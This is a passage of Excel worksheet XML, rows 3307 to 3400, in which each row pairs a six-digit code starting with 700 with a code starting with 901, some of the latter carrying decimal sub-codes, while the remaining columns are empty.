      <c r="B3307" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D3307" s="5"/>
      <c r="E3307" s="3"/>
      <c r="F3307" s="1"/>
      <c r="H3307" s="1"/>
    </row>
    <row r="3308" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3308" s="5">
        <v>700201</v>
      </c>
      <c r="B3308" s="3">
        <v>901082</v>
      </c>
      <c r="D3308" s="5"/>
      <c r="E3308" s="3"/>
      <c r="F3308" s="1"/>
      <c r="H3308" s="1"/>
    </row>
    <row r="3309" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3309" s="5">
        <v>700201</v>
      </c>
      <c r="B3309" s="3">
        <v>901016</v>
      </c>
      <c r="D3309" s="5"/>
      <c r="E3309" s="3"/>
      <c r="F3309" s="1"/>
      <c r="H3309" s="1"/>
    </row>
    <row r="3310" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3310" s="5">
        <v>700201</v>
      </c>
      <c r="B3310" s="3">
        <v>901033</v>
      </c>
      <c r="D3310" s="5"/>
      <c r="E3310" s="3"/>
      <c r="F3310" s="1"/>
      <c r="H3310" s="1"/>
    </row>
    <row r="3311" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3311" s="5">
        <v>700201</v>
      </c>
      <c r="B3311" s="3">
        <v>901007</v>
      </c>
      <c r="D3311" s="5"/>
      <c r="E3311" s="3"/>
      <c r="F3311" s="1"/>
      <c r="H3311" s="1"/>
    </row>
    <row r="3312" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3312" s="5">
        <v>700283</v>
      </c>
      <c r="B3312" s="3">
        <v>901123</v>
      </c>
      <c r="D3312" s="5"/>
      <c r="E3312" s="3"/>
      <c r="F3312" s="1"/>
      <c r="H3312" s="1"/>
    </row>
    <row r="3313" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3313" s="5">
        <v>700283</v>
      </c>
      <c r="B3313" s="3">
        <v>901037.005</v>
      </c>
      <c r="D3313" s="5"/>
      <c r="E3313" s="3"/>
      <c r="F3313" s="1"/>
      <c r="H3313" s="1"/>
    </row>
    <row r="3314" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3314" s="5">
        <v>700283</v>
      </c>
      <c r="B3314" s="3">
        <v>901115</v>
      </c>
      <c r="D3314" s="5"/>
      <c r="E3314" s="3"/>
      <c r="F3314" s="1"/>
      <c r="H3314" s="1"/>
    </row>
    <row r="3315" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3315" s="5">
        <v>700283</v>
      </c>
      <c r="B3315" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3315" s="5"/>
      <c r="E3315" s="3"/>
      <c r="F3315" s="1"/>
      <c r="H3315" s="1"/>
    </row>
    <row r="3316" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3316" s="5">
        <v>700283</v>
      </c>
      <c r="B3316" s="3">
        <v>901059.005</v>
      </c>
      <c r="D3316" s="5"/>
      <c r="E3316" s="3"/>
      <c r="F3316" s="1"/>
      <c r="H3316" s="1"/>
    </row>
    <row r="3317" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3317" s="5">
        <v>700283</v>
      </c>
      <c r="B3317" s="3">
        <v>901059.00699999998</v>
      </c>
      <c r="D3317" s="5"/>
      <c r="E3317" s="3"/>
      <c r="F3317" s="1"/>
      <c r="H3317" s="1"/>
    </row>
    <row r="3318" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3318" s="5">
        <v>700283</v>
      </c>
      <c r="B3318" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D3318" s="5"/>
      <c r="E3318" s="3"/>
      <c r="F3318" s="1"/>
      <c r="H3318" s="1"/>
    </row>
    <row r="3319" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3319" s="5">
        <v>700283</v>
      </c>
      <c r="B3319" s="3">
        <v>901083</v>
      </c>
      <c r="D3319" s="5"/>
      <c r="E3319" s="3"/>
      <c r="F3319" s="1"/>
      <c r="H3319" s="1"/>
    </row>
    <row r="3320" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3320" s="5">
        <v>700283</v>
      </c>
      <c r="B3320" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D3320" s="5"/>
      <c r="E3320" s="3"/>
      <c r="F3320" s="1"/>
      <c r="H3320" s="1"/>
    </row>
    <row r="3321" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3321" s="5">
        <v>700283</v>
      </c>
      <c r="B3321" s="3">
        <v>901105</v>
      </c>
      <c r="D3321" s="5"/>
      <c r="E3321" s="3"/>
      <c r="F3321" s="1"/>
      <c r="H3321" s="1"/>
    </row>
    <row r="3322" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3322" s="5">
        <v>700283</v>
      </c>
      <c r="B3322" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D3322" s="5"/>
      <c r="E3322" s="3"/>
      <c r="F3322" s="1"/>
      <c r="H3322" s="1"/>
    </row>
    <row r="3323" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3323" s="5">
        <v>700283</v>
      </c>
      <c r="B3323" s="3">
        <v>901027</v>
      </c>
      <c r="D3323" s="5"/>
      <c r="E3323" s="3"/>
      <c r="F3323" s="1"/>
      <c r="H3323" s="1"/>
    </row>
    <row r="3324" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3324" s="5">
        <v>700283</v>
      </c>
      <c r="B3324" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D3324" s="5"/>
      <c r="E3324" s="3"/>
      <c r="F3324" s="1"/>
      <c r="H3324" s="1"/>
    </row>
    <row r="3325" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3325" s="5">
        <v>700283</v>
      </c>
      <c r="B3325" s="3">
        <v>901120</v>
      </c>
      <c r="D3325" s="5"/>
      <c r="E3325" s="3"/>
      <c r="F3325" s="1"/>
      <c r="H3325" s="1"/>
    </row>
    <row r="3326" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3326" s="5">
        <v>700283</v>
      </c>
      <c r="B3326" s="3">
        <v>901057</v>
      </c>
      <c r="D3326" s="5"/>
      <c r="E3326" s="3"/>
      <c r="F3326" s="1"/>
      <c r="H3326" s="1"/>
    </row>
    <row r="3327" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3327" s="5">
        <v>700283</v>
      </c>
      <c r="B3327" s="3">
        <v>901090</v>
      </c>
      <c r="D3327" s="5"/>
      <c r="E3327" s="3"/>
      <c r="F3327" s="1"/>
      <c r="H3327" s="1"/>
    </row>
    <row r="3328" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3328" s="5">
        <v>700283</v>
      </c>
      <c r="B3328" s="3">
        <v>901021.00100000005</v>
      </c>
      <c r="D3328" s="5"/>
      <c r="E3328" s="3"/>
      <c r="F3328" s="1"/>
      <c r="H3328" s="1"/>
    </row>
    <row r="3329" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3329" s="5">
        <v>700283</v>
      </c>
      <c r="B3329" s="3">
        <v>901029</v>
      </c>
      <c r="D3329" s="5"/>
      <c r="E3329" s="3"/>
      <c r="F3329" s="1"/>
      <c r="H3329" s="1"/>
    </row>
    <row r="3330" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3330" s="5">
        <v>700283</v>
      </c>
      <c r="B3330" s="3">
        <v>901113</v>
      </c>
      <c r="D3330" s="5"/>
      <c r="E3330" s="3"/>
      <c r="F3330" s="1"/>
      <c r="H3330" s="1"/>
    </row>
    <row r="3331" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3331" s="5">
        <v>700283</v>
      </c>
      <c r="B3331" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D3331" s="5"/>
      <c r="E3331" s="3"/>
      <c r="F3331" s="1"/>
      <c r="H3331" s="1"/>
    </row>
    <row r="3332" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3332" s="5">
        <v>700283</v>
      </c>
      <c r="B3332" s="3">
        <v>901082</v>
      </c>
      <c r="D3332" s="5"/>
      <c r="E3332" s="3"/>
      <c r="F3332" s="1"/>
      <c r="H3332" s="1"/>
    </row>
    <row r="3333" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3333" s="5">
        <v>700283</v>
      </c>
      <c r="B3333" s="3">
        <v>901016</v>
      </c>
      <c r="D3333" s="5"/>
      <c r="E3333" s="3"/>
      <c r="F3333" s="1"/>
      <c r="H3333" s="1"/>
    </row>
    <row r="3334" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3334" s="5">
        <v>700283</v>
      </c>
      <c r="B3334" s="3">
        <v>901049</v>
      </c>
      <c r="D3334" s="5"/>
      <c r="E3334" s="3"/>
      <c r="F3334" s="1"/>
      <c r="H3334" s="1"/>
    </row>
    <row r="3335" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3335" s="5">
        <v>700283</v>
      </c>
      <c r="B3335" s="3">
        <v>901007</v>
      </c>
      <c r="D3335" s="5"/>
      <c r="E3335" s="3"/>
      <c r="F3335" s="1"/>
      <c r="H3335" s="1"/>
    </row>
    <row r="3336" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3336" s="5">
        <v>700283</v>
      </c>
      <c r="B3336" s="3">
        <v>901552.00100000005</v>
      </c>
      <c r="D3336" s="5"/>
      <c r="E3336" s="3"/>
      <c r="F3336" s="1"/>
      <c r="H3336" s="1"/>
    </row>
    <row r="3337" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3337" s="5">
        <v>700283</v>
      </c>
      <c r="B3337" s="3">
        <v>901552.00399999996</v>
      </c>
      <c r="D3337" s="5"/>
      <c r="E3337" s="3"/>
      <c r="F3337" s="1"/>
      <c r="H3337" s="1"/>
    </row>
    <row r="3338" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3338" s="5">
        <v>700283</v>
      </c>
      <c r="B3338" s="3">
        <v>901125</v>
      </c>
      <c r="D3338" s="5"/>
      <c r="E3338" s="3"/>
      <c r="F3338" s="1"/>
      <c r="H3338" s="1"/>
    </row>
    <row r="3339" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3339" s="5">
        <v>700283</v>
      </c>
      <c r="B3339" s="3">
        <v>901047</v>
      </c>
      <c r="D3339" s="5"/>
      <c r="E3339" s="3"/>
      <c r="F3339" s="1"/>
      <c r="H3339" s="1"/>
    </row>
    <row r="3340" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3340" s="5">
        <v>700648</v>
      </c>
      <c r="B3340" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D3340" s="5"/>
      <c r="E3340" s="3"/>
      <c r="F3340" s="1"/>
      <c r="H3340" s="1"/>
    </row>
    <row r="3341" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3341" s="5">
        <v>700648</v>
      </c>
      <c r="B3341" s="3">
        <v>901059.005</v>
      </c>
      <c r="D3341" s="5"/>
      <c r="E3341" s="3"/>
      <c r="F3341" s="1"/>
      <c r="H3341" s="1"/>
    </row>
    <row r="3342" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3342" s="5">
        <v>700648</v>
      </c>
      <c r="B3342" s="3">
        <v>901059.00699999998</v>
      </c>
      <c r="D3342" s="5"/>
      <c r="E3342" s="3"/>
      <c r="F3342" s="1"/>
      <c r="H3342" s="1"/>
    </row>
    <row r="3343" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3343" s="5">
        <v>700648</v>
      </c>
      <c r="B3343" s="3">
        <v>901105</v>
      </c>
      <c r="D3343" s="5"/>
      <c r="E3343" s="3"/>
      <c r="F3343" s="1"/>
      <c r="H3343" s="1"/>
    </row>
    <row r="3344" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3344" s="5">
        <v>700648</v>
      </c>
      <c r="B3344" s="3">
        <v>901566.00100000005</v>
      </c>
      <c r="D3344" s="5"/>
      <c r="E3344" s="3"/>
      <c r="F3344" s="1"/>
      <c r="H3344" s="1"/>
    </row>
    <row r="3345" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3345" s="5">
        <v>700648</v>
      </c>
      <c r="B3345" s="3">
        <v>901053.005</v>
      </c>
      <c r="D3345" s="5"/>
      <c r="E3345" s="3"/>
      <c r="F3345" s="1"/>
      <c r="H3345" s="1"/>
    </row>
    <row r="3346" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3346" s="5">
        <v>700648</v>
      </c>
      <c r="B3346" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D3346" s="5"/>
      <c r="E3346" s="3"/>
      <c r="F3346" s="1"/>
      <c r="H3346" s="1"/>
    </row>
    <row r="3347" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3347" s="5">
        <v>700325</v>
      </c>
      <c r="B3347" s="3">
        <v>901407</v>
      </c>
      <c r="D3347" s="5"/>
      <c r="E3347" s="3"/>
      <c r="F3347" s="1"/>
      <c r="H3347" s="1"/>
    </row>
    <row r="3348" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3348" s="5">
        <v>700325</v>
      </c>
      <c r="B3348" s="3">
        <v>901472</v>
      </c>
      <c r="D3348" s="5"/>
      <c r="E3348" s="3"/>
      <c r="F3348" s="1"/>
      <c r="H3348" s="1"/>
    </row>
    <row r="3349" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3349" s="5">
        <v>700215</v>
      </c>
      <c r="B3349" s="3">
        <v>901189</v>
      </c>
      <c r="D3349" s="5"/>
      <c r="E3349" s="3"/>
      <c r="F3349" s="1"/>
      <c r="H3349" s="1"/>
    </row>
    <row r="3350" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3350" s="5">
        <v>700215</v>
      </c>
      <c r="B3350" s="3">
        <v>901105</v>
      </c>
      <c r="D3350" s="5"/>
      <c r="E3350" s="3"/>
      <c r="F3350" s="1"/>
      <c r="H3350" s="1"/>
    </row>
    <row r="3351" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3351" s="5">
        <v>700215</v>
      </c>
      <c r="B3351" s="3">
        <v>901082</v>
      </c>
      <c r="D3351" s="5"/>
      <c r="E3351" s="3"/>
      <c r="F3351" s="1"/>
      <c r="H3351" s="1"/>
    </row>
    <row r="3352" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3352" s="5">
        <v>700215</v>
      </c>
      <c r="B3352" s="3">
        <v>901102.00199999998</v>
      </c>
      <c r="D3352" s="5"/>
      <c r="E3352" s="3"/>
      <c r="F3352" s="1"/>
      <c r="H3352" s="1"/>
    </row>
    <row r="3353" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3353" s="5">
        <v>700088</v>
      </c>
      <c r="B3353" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3353" s="5"/>
      <c r="E3353" s="3"/>
      <c r="F3353" s="1"/>
      <c r="H3353" s="1"/>
    </row>
    <row r="3354" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3354" s="5">
        <v>700088</v>
      </c>
      <c r="B3354" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3354" s="5"/>
      <c r="E3354" s="3"/>
      <c r="F3354" s="1"/>
      <c r="H3354" s="1"/>
    </row>
    <row r="3355" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3355" s="5">
        <v>700088</v>
      </c>
      <c r="B3355" s="3">
        <v>901083</v>
      </c>
      <c r="D3355" s="5"/>
      <c r="E3355" s="3"/>
      <c r="F3355" s="1"/>
      <c r="H3355" s="1"/>
    </row>
    <row r="3356" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3356" s="5">
        <v>700088</v>
      </c>
      <c r="B3356" s="3">
        <v>901105</v>
      </c>
      <c r="D3356" s="5"/>
      <c r="E3356" s="3"/>
      <c r="F3356" s="1"/>
      <c r="H3356" s="1"/>
    </row>
    <row r="3357" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3357" s="5">
        <v>700088</v>
      </c>
      <c r="B3357" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D3357" s="5"/>
      <c r="E3357" s="3"/>
      <c r="F3357" s="1"/>
      <c r="H3357" s="1"/>
    </row>
    <row r="3358" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3358" s="5">
        <v>700088</v>
      </c>
      <c r="B3358" s="3">
        <v>901057</v>
      </c>
      <c r="D3358" s="5"/>
      <c r="E3358" s="3"/>
      <c r="F3358" s="1"/>
      <c r="H3358" s="1"/>
    </row>
    <row r="3359" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3359" s="5">
        <v>700088</v>
      </c>
      <c r="B3359" s="3">
        <v>901113</v>
      </c>
      <c r="D3359" s="5"/>
      <c r="E3359" s="3"/>
      <c r="F3359" s="1"/>
      <c r="H3359" s="1"/>
    </row>
    <row r="3360" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3360" s="5">
        <v>700088</v>
      </c>
      <c r="B3360" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D3360" s="5"/>
      <c r="E3360" s="3"/>
      <c r="F3360" s="1"/>
      <c r="H3360" s="1"/>
    </row>
    <row r="3361" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3361" s="5">
        <v>700088</v>
      </c>
      <c r="B3361" s="3">
        <v>901082</v>
      </c>
      <c r="D3361" s="5"/>
      <c r="E3361" s="3"/>
      <c r="F3361" s="1"/>
      <c r="H3361" s="1"/>
    </row>
    <row r="3362" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3362" s="5">
        <v>700265</v>
      </c>
      <c r="B3362" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D3362" s="5"/>
      <c r="E3362" s="3"/>
      <c r="F3362" s="1"/>
      <c r="H3362" s="1"/>
    </row>
    <row r="3363" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3363" s="5">
        <v>700265</v>
      </c>
      <c r="B3363" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3363" s="5"/>
      <c r="E3363" s="3"/>
      <c r="F3363" s="1"/>
      <c r="H3363" s="1"/>
    </row>
    <row r="3364" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3364" s="5">
        <v>700265</v>
      </c>
      <c r="B3364" s="3">
        <v>901071.00199999998</v>
      </c>
      <c r="D3364" s="5"/>
      <c r="E3364" s="3"/>
      <c r="F3364" s="1"/>
      <c r="H3364" s="1"/>
    </row>
    <row r="3365" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3365" s="5">
        <v>700265</v>
      </c>
      <c r="B3365" s="3">
        <v>901010</v>
      </c>
      <c r="D3365" s="5"/>
      <c r="E3365" s="3"/>
      <c r="F3365" s="1"/>
      <c r="H3365" s="1"/>
    </row>
    <row r="3366" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3366" s="5">
        <v>700265</v>
      </c>
      <c r="B3366" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3366" s="5"/>
      <c r="E3366" s="3"/>
      <c r="F3366" s="1"/>
      <c r="H3366" s="1"/>
    </row>
    <row r="3367" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3367" s="5">
        <v>700265</v>
      </c>
      <c r="B3367" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D3367" s="5"/>
      <c r="E3367" s="3"/>
      <c r="F3367" s="1"/>
      <c r="H3367" s="1"/>
    </row>
    <row r="3368" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3368" s="5">
        <v>700265</v>
      </c>
      <c r="B3368" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3368" s="5"/>
      <c r="E3368" s="3"/>
      <c r="F3368" s="1"/>
      <c r="H3368" s="1"/>
    </row>
    <row r="3369" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3369" s="5">
        <v>700265</v>
      </c>
      <c r="B3369" s="3">
        <v>901059.00399999996</v>
      </c>
      <c r="D3369" s="5"/>
      <c r="E3369" s="3"/>
      <c r="F3369" s="1"/>
      <c r="H3369" s="1"/>
    </row>
    <row r="3370" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3370" s="5">
        <v>700265</v>
      </c>
      <c r="B3370" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D3370" s="5"/>
      <c r="E3370" s="3"/>
      <c r="F3370" s="1"/>
      <c r="H3370" s="1"/>
    </row>
    <row r="3371" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3371" s="5">
        <v>700265</v>
      </c>
      <c r="B3371" s="3">
        <v>901485</v>
      </c>
      <c r="D3371" s="5"/>
      <c r="E3371" s="3"/>
      <c r="F3371" s="1"/>
      <c r="H3371" s="1"/>
    </row>
    <row r="3372" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3372" s="5">
        <v>700265</v>
      </c>
      <c r="B3372" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D3372" s="5"/>
      <c r="E3372" s="3"/>
      <c r="F3372" s="1"/>
      <c r="H3372" s="1"/>
    </row>
    <row r="3373" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3373" s="5">
        <v>700265</v>
      </c>
      <c r="B3373" s="3">
        <v>901005</v>
      </c>
      <c r="D3373" s="5"/>
      <c r="E3373" s="3"/>
      <c r="F3373" s="1"/>
      <c r="H3373" s="1"/>
    </row>
    <row r="3374" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3374" s="5">
        <v>700265</v>
      </c>
      <c r="B3374" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D3374" s="5"/>
      <c r="E3374" s="3"/>
      <c r="F3374" s="1"/>
      <c r="H3374" s="1"/>
    </row>
    <row r="3375" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3375" s="5">
        <v>700265</v>
      </c>
      <c r="B3375" s="3">
        <v>901008</v>
      </c>
      <c r="D3375" s="5"/>
      <c r="E3375" s="3"/>
      <c r="F3375" s="1"/>
      <c r="H3375" s="1"/>
    </row>
    <row r="3376" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3376" s="5">
        <v>700265</v>
      </c>
      <c r="B3376" s="3">
        <v>901083</v>
      </c>
      <c r="D3376" s="5"/>
      <c r="E3376" s="3"/>
      <c r="F3376" s="1"/>
      <c r="H3376" s="1"/>
    </row>
    <row r="3377" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3377" s="5">
        <v>700265</v>
      </c>
      <c r="B3377" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D3377" s="5"/>
      <c r="E3377" s="3"/>
      <c r="F3377" s="1"/>
      <c r="H3377" s="1"/>
    </row>
    <row r="3378" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3378" s="5">
        <v>700265</v>
      </c>
      <c r="B3378" s="3">
        <v>901105</v>
      </c>
      <c r="D3378" s="5"/>
      <c r="E3378" s="3"/>
      <c r="F3378" s="1"/>
      <c r="H3378" s="1"/>
    </row>
    <row r="3379" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3379" s="5">
        <v>700265</v>
      </c>
      <c r="B3379" s="3">
        <v>901027</v>
      </c>
      <c r="D3379" s="5"/>
      <c r="E3379" s="3"/>
      <c r="F3379" s="1"/>
      <c r="H3379" s="1"/>
    </row>
    <row r="3380" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3380" s="5">
        <v>700265</v>
      </c>
      <c r="B3380" s="3">
        <v>901069.00100000005</v>
      </c>
      <c r="D3380" s="5"/>
      <c r="E3380" s="3"/>
      <c r="F3380" s="1"/>
      <c r="H3380" s="1"/>
    </row>
    <row r="3381" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3381" s="5">
        <v>700265</v>
      </c>
      <c r="B3381" s="3">
        <v>901057</v>
      </c>
      <c r="D3381" s="5"/>
      <c r="E3381" s="3"/>
      <c r="F3381" s="1"/>
      <c r="H3381" s="1"/>
    </row>
    <row r="3382" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3382" s="5">
        <v>700265</v>
      </c>
      <c r="B3382" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D3382" s="5"/>
      <c r="E3382" s="3"/>
      <c r="F3382" s="1"/>
      <c r="H3382" s="1"/>
    </row>
    <row r="3383" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3383" s="5">
        <v>700265</v>
      </c>
      <c r="B3383" s="3">
        <v>901090.00100000005</v>
      </c>
      <c r="D3383" s="5"/>
      <c r="E3383" s="3"/>
      <c r="F3383" s="1"/>
      <c r="H3383" s="1"/>
    </row>
    <row r="3384" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3384" s="5">
        <v>700265</v>
      </c>
      <c r="B3384" s="3">
        <v>901029</v>
      </c>
      <c r="D3384" s="5"/>
      <c r="E3384" s="3"/>
      <c r="F3384" s="1"/>
      <c r="H3384" s="1"/>
    </row>
    <row r="3385" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3385" s="5">
        <v>700265</v>
      </c>
      <c r="B3385" s="3">
        <v>901113</v>
      </c>
      <c r="D3385" s="5"/>
      <c r="E3385" s="3"/>
      <c r="F3385" s="1"/>
      <c r="H3385" s="1"/>
    </row>
    <row r="3386" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3386" s="5">
        <v>700265</v>
      </c>
      <c r="B3386" s="3">
        <v>901082</v>
      </c>
      <c r="D3386" s="5"/>
      <c r="E3386" s="3"/>
      <c r="F3386" s="1"/>
      <c r="H3386" s="1"/>
    </row>
    <row r="3387" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3387" s="5">
        <v>700265</v>
      </c>
      <c r="B3387" s="3">
        <v>901016</v>
      </c>
      <c r="D3387" s="5"/>
      <c r="E3387" s="3"/>
      <c r="F3387" s="1"/>
      <c r="H3387" s="1"/>
    </row>
    <row r="3388" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3388" s="5">
        <v>700265</v>
      </c>
      <c r="B3388" s="3">
        <v>901033</v>
      </c>
      <c r="D3388" s="5"/>
      <c r="E3388" s="3"/>
      <c r="F3388" s="1"/>
      <c r="H3388" s="1"/>
    </row>
    <row r="3389" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3389" s="5">
        <v>700265</v>
      </c>
      <c r="B3389" s="3">
        <v>901125</v>
      </c>
      <c r="D3389" s="5"/>
      <c r="E3389" s="3"/>
      <c r="F3389" s="1"/>
      <c r="H3389" s="1"/>
    </row>
    <row r="3390" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3390" s="5">
        <v>700265</v>
      </c>
      <c r="B3390" s="3">
        <v>901102.00199999998</v>
      </c>
      <c r="D3390" s="5"/>
      <c r="E3390" s="3"/>
      <c r="F3390" s="1"/>
      <c r="H3390" s="1"/>
    </row>
    <row r="3391" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3391" s="5">
        <v>700265</v>
      </c>
      <c r="B3391" s="3">
        <v>901047</v>
      </c>
      <c r="D3391" s="5"/>
      <c r="E3391" s="3"/>
      <c r="F3391" s="1"/>
      <c r="H3391" s="1"/>
    </row>
    <row r="3392" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3392" s="5">
        <v>700585</v>
      </c>
      <c r="B3392" s="3">
        <v>901059.005</v>
      </c>
      <c r="D3392" s="5"/>
      <c r="E3392" s="3"/>
      <c r="F3392" s="1"/>
      <c r="H3392" s="1"/>
    </row>
    <row r="3393" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3393" s="5">
        <v>700585</v>
      </c>
      <c r="B3393" s="3">
        <v>901140</v>
      </c>
      <c r="D3393" s="5"/>
      <c r="E3393" s="3"/>
      <c r="F3393" s="1"/>
      <c r="H3393" s="1"/>
    </row>
    <row r="3394" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3394" s="5">
        <v>700585</v>
      </c>
      <c r="B3394" s="3">
        <v>901574.00199999998</v>
      </c>
      <c r="D3394" s="5"/>
      <c r="E3394" s="3"/>
      <c r="F3394" s="1"/>
      <c r="H3394" s="1"/>
    </row>
    <row r="3395" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3395" s="5">
        <v>700585</v>
      </c>
      <c r="B3395" s="3">
        <v>901105</v>
      </c>
      <c r="D3395" s="5"/>
      <c r="E3395" s="3"/>
      <c r="F3395" s="1"/>
      <c r="H3395" s="1"/>
    </row>
    <row r="3396" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3396" s="5">
        <v>700585</v>
      </c>
      <c r="B3396" s="3">
        <v>901027</v>
      </c>
      <c r="D3396" s="5"/>
      <c r="E3396" s="3"/>
      <c r="F3396" s="1"/>
      <c r="H3396" s="1"/>
    </row>
    <row r="3397" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3397" s="5">
        <v>700585</v>
      </c>
      <c r="B3397" s="3">
        <v>901566.00100000005</v>
      </c>
      <c r="D3397" s="5"/>
      <c r="E3397" s="3"/>
      <c r="F3397" s="1"/>
      <c r="H3397" s="1"/>
    </row>
    <row r="3398" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3398" s="5">
        <v>700585</v>
      </c>
      <c r="B3398" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D3398" s="5"/>
      <c r="E3398" s="3"/>
      <c r="F3398" s="1"/>
      <c r="H3398" s="1"/>
    </row>
    <row r="3399" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3399" s="5">
        <v>700585</v>
      </c>
      <c r="B3399" s="3">
        <v>901082</v>
      </c>
      <c r="D3399" s="5"/>
      <c r="E3399" s="3"/>
      <c r="F3399" s="1"/>
      <c r="H3399" s="1"/>
    </row>
    <row r="3400" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3400" s="5">
        <v>700585</v>
      </c>
      <c r="B3400" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D3400" s="5"/>
      <c r="E3400" s="3"/>
      <c r="F3400" s="1"/>
      <c r="H3400" s="1"/>
    </row>
